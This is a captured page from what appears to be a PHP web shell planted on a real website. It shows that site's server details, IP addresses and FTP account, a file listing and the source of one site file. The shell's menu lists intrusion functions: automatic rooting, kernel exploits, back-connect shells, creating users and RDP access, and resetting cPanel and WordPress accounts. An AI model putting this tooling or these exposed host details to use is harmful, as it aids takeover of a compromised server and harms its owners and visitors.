Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
images /
acmesolar /
[ HOME SHELL ]
Name
Size
Permission
Action
acmeadmin
[ DIR ]
drwxr-xr-x
400.shtml
130
B
-rw-r--r--
401.shtml
162
B
-rw-r--r--
403.shtml
201
B
-rw-r--r--
404.shtml
83
B
-rw-r--r--
500.php
461
B
-rw-r--r--
500.shtml
71
B
-rw-r--r--
acme-aboutus.php
1.38
KB
-rw-r--r--
acme-contactus.php
10.2
KB
-rw-r--r--
acme-events.php
1.38
KB
-rw-r--r--
acme-footer.php
128
B
-rw-r--r--
acme-header.php
813
B
-rw-r--r--
acme-header_5_oct_12.php
786
B
-rw-r--r--
acme-home.php
5.45
KB
-rw-r--r--
acme-home_5_oct_12.php
3.1
KB
-rw-r--r--
acme-leftpart.php
1.61
KB
-rw-r--r--
acme-manufacturingfacality.php
1.4
KB
-rw-r--r--
acme-productdetail.php
4.93
KB
-rw-r--r--
acme-productdetail_5_oct_12.ph...
4.93
KB
-rw-r--r--
acme-sitemap.php
1.38
KB
-rw-r--r--
client_connection.php
453
B
-rw-r--r--
default.html
0
B
-rw-r--r--
error_log
142.92
KB
-rw-r--r--
favicon.ico
43
B
-rw-r--r--
home.css
5.64
KB
-rw-r--r--
home_5_oct_12.css
3.38
KB
-rw-r--r--
index.php
44
B
-rw-r--r--
recaptchalib.php
9.53
KB
-rw-r--r--
subpage-9-oct.css
1.26
KB
-rw-r--r--
subpage.css
1.59
KB
-rw-r--r--
subpage_5_oct_12.css
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acme-leftpart.php
<ul> <?php $ProductPageArray=explode("/",$_SERVER['REQUEST_URI']); $ProductPage=strtolower($ProductPageArray[1]); if($ProductPage == "acme-productdetail.php") { $qrySelProd = "SELECT prod_type_id FROM product_type ORDER BY prod_type_id ASC"; $qSelProd = mysql_query($qrySelProd); $fetchId = mysql_fetch_array($qSelProd); $prodTypeID = $fetchId["prod_type_id"]; } else { $prodTypeID = $_GET["id"]; } //$prodTypeID = $_GET["id"]; $qrySelProdType = "SELECT prod_type_id,prod_type_title,sequence FROM product_type WHERE visible=1 order by sequence asc"; $qSelProdType = mysql_query($qrySelProdType); while($fetchRec = mysql_fetch_array($qSelProdType)) { $prodTypeId = $fetchRec["prod_type_id"]; $prodTitle = $fetchRec["prod_type_title"]; if(($_GET["msg"] == "selected") && ($prodTypeID == $prodTypeId)) { $selected = "class='selected'"; } else if($prodTypeID == $prodTypeId) { $selected = "class='selected'"; } else { $selected = ""; } ?> <li <?php echo $selected ; ?>> <a href="acme-productdetail.php?id=<?php echo $prodTypeId; ?>&msg=selected"><?php echo $prodTitle; ?></a> </li> <?php } ?> <!-- <li class="wg"><a href="WheatGrass"> </a></li> <li class="tomato"><a href="Tomato"> </a></li> <li class="mango"><a href="Mango"> </a></li> <li class="ginger"><a href="Ginger"> </a></li> <li class="safedmusli"><a href="SafedMusli"> </a></li> <li class="amla"><a href="Amla"> </a></li> <li class="banana"><a href="Banana"> </a></li> <li class="sapota"><a href="Sapota"> </a></li> --> </ul>
Close